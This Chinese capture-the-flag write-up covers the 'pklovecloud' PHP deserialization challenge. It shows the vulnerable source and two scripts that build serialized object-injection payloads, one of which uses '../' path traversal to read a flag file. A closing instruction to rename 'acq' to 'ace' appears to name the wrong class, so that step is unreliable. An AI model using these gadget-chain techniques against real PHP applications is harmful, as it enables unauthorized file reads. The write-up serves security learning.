[第五空间 2021]pklovecloud 已解决

 <?php  
include 'flag.php';
/**
 * Default name provider; acp's constructor stores an instance of this class.
 */
class pkshow
{
    /**
     * @return string the fixed banner text
     */
    public function echo_name()
    {
        $banner = "Pk very safe^.^";

        return $banner;
    }
}

/**
 * Holder whose string conversion delegates to whatever object sits in $cinder.
 *
 * The constructor stores a pkshow, but unserialize() restores property values
 * without running __construct(), so an acp instance rebuilt from serialized
 * input can carry any object in $cinder.
 */
class acp 
{   
    protected $cinder;  // set to a pkshow in __construct(); its type is never checked afterwards
    public $neutron;
    public $nova;
    function __construct() 
    {      
        $this->cinder = new pkshow;
    }  
    // Runs when an acp instance is used as a string (the script does `echo $logData`).
    // NOTE(review): there is no instanceof check before echo_name() is called, and
    // nothing is returned when $cinder is unset.
    function __toString()      
    {          
        if (isset($this->cinder))  
            return $this->cinder->echo_name();      
    }  
}  

/**
 * Reads a file named by $filename after comparing two fields of an object
 * rebuilt from $docker.
 *
 * All three properties are public and none of them is validated in this class.
 */
class ace
{    
    public $filename;     // interpolated into "./{...}" below without any path check
    public $openstack;    // overwritten by echo_name()
    public $docker;       // serialized string handed to unserialize() in echo_name()
    /**
     * Returns the file contents, the string "keystone lost~", or nothing at all
     * when the neutron/nova comparison fails.
     */
    function echo_name()      
    {   
        // NOTE(review): nested unserialize(); $docker is a public property, so its
        // content is caller-supplied whenever this object was built from serialized input.
        $this->openstack = unserialize($this->docker);
        // $heat is never defined in this method, so neutron is set to null
        // (PHP reports an undefined-variable warning).
        $this->openstack->neutron = $heat;
        // Strict comparison against nova; with neutron forced to null above it holds
        // when nova is null as well, so it does not act as an access check.
        if($this->openstack->neutron === $this->openstack->nova)
        {
        // No normalisation or allow-list: "../" segments in $filename are kept as-is.
        $file = "./{$this->filename}";
            // The file is read twice; a failed read or falsy content ("" or "0")
            // falls through to the "keystone lost~" branch.
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "keystone lost~"; 
            }    
        }
    }  
}  

// NOTE(review): unserialize() on a raw request parameter lets the client decide
// which of the classes above is instantiated and with which property values.
// Safer patterns: json_decode() for plain data, or
// unserialize($s, ['allowed_classes' => false]) when the format cannot change.
if (isset($_GET['pks']))  
{
    $logData = unserialize($_GET['pks']);
    echo $logData;   // string conversion: invokes __toString() when $logData is an object
} 
else 
{ 
    highlight_file(__file__);   // no parameter given: print this script's own source
}
?> 

这里 NSSCTF 把 flag 藏到了别的位置（见下面 payload 里用到的文件名）。

<?php
// Local stand-in for the challenge's acp class: same class name and the same
// three properties, with no __toString() because methods are not serialized.
class acp
{
    protected $cinder;
    public $neutron;
    public $nova;
    // $cinder is protected, so it is filled through the constructor rather than
    // by assignment from outside the class.
    public function __construct($class){
        $this->cinder = $class;
    }
}

// Property-only stand-in for the challenge's ace class (no echo_name() here).
// The declaration order differs from the challenge listing: docker comes before openstack.
class ace
{
    public $filename;
    public $docker;
    public $openstack;
}
$ace = new ace();
$acp = new acp($ace);   // acp::$cinder now refers to the ace object

// This runs before $filename is assigned, so the nested string describes the
// ace object while its filename is still null.
$ace->docker = serialize($acp);
$ace->filename = '../../../../nssctfasdasdflag';   // relative path with four "../" segments
// urlencode() turns the NUL bytes that serialize() puts around a protected
// property name into %00, so the value survives inside a query string.
echo urlencode(serialize($acp));
$cinder 是 protected 属性，在类外不能直接赋值，所以这里通过 __construct 把对象传进去来设置它，算是一个小技巧。

还有另一种 payload 写法，用来绕过 protected 属性的限制：

<?php
// Property-only stand-in for the challenge's acp class; it has no constructor here,
// so $cinder stays unset on every instance this script creates.
class acp
{
    protected $cinder;  // the awkward one: protected, so it cannot be assigned from outside
    public $neutron;
    public $nova;

}

// Helper class that does not exist in the challenge: the same three fields as
// acp, but with $cinder public so the script can assign it directly.
class acq
{
    public $cinder;  // public counterpart of acp::$cinder
    public $neutron;
    public $nova;

}

// Property-only stand-in for the challenge's ace class, with the properties in
// the same order as the challenge listing.
class ace
{
    public $filename;
    public $openstack;
    public $docker;

}


$a = new acp();
$a->nova = $a->neutron;   // neutron is unset at this point, so nova is assigned null
$b = new ace();
$b->docker = serialize($a);   // inner object: an acp with all three fields null
$b->filename = "flag.php";

$c = new acq();
$c->cinder = $b;   // permitted because acq::$cinder is public
echo serialize($c);   // printed raw, without urlencode()

记着把得到的结果将acq改为ace,同时protected属性的成员要加上%00*%00

两种不同的payload

<?php
//class acp
//{
//    protected $cinder;
//    public $neutron;
//    public $nova;
//    public function __construct($class){
//        $this->cinder = $class;
//    }
//}
//
//class ace
//{
//    public $filename;
//    public $docker;
//    public $openstack;
//}
//$ace = new ace();
//$acp = new acp($ace);
//
//$ace->docker = serialize($acp);
//$ace->filename = '../../../../nssctfasdasdflag';
//echo urlencode(serialize($acp));
// Property-only stand-in for the challenge's acp class; it has no constructor here,
// so $cinder stays unset on every instance this script creates.
class acp
{
    protected $cinder;  // the awkward one: protected, so it cannot be assigned from outside
    public $neutron;
    public $nova;

}

// Helper class that does not exist in the challenge: the same three fields as
// acp, but with $cinder public so the script can assign it directly.
class acq
{
    public $cinder;  // public counterpart of acp::$cinder
    public $neutron;
    public $nova;

}

// Property-only stand-in for the challenge's ace class, with the properties in
// the same order as the challenge listing.
class ace
{
    public $filename;
    public $openstack;
    public $docker;

}


$a = new acp();
$a->nova = $a->neutron;
// makes the object pass the if comparison (neutron is unset here, so nova becomes null)
$b = new ace();
$b->docker = serialize($a);
// ace performs its check on acp's fields, hence $b->docker = serialize($a);
$b->filename = "flag.php";

$c = new acq();// relies on the public property
$c->cinder = $b;
// function __toString()
//    {
//        if (isset($this->cinder))
//            return $this->cinder->echo_name();
//    }  <- this is what calls ace's echo_name, which returns the flag
echo serialize($c);

//记着把得到的结果将acq改为ace,同时protected属性的成员要加上%00*%00

posted @ 2023-04-20 15:43  Dr0se  阅读(78)  评论(0)    收藏  举报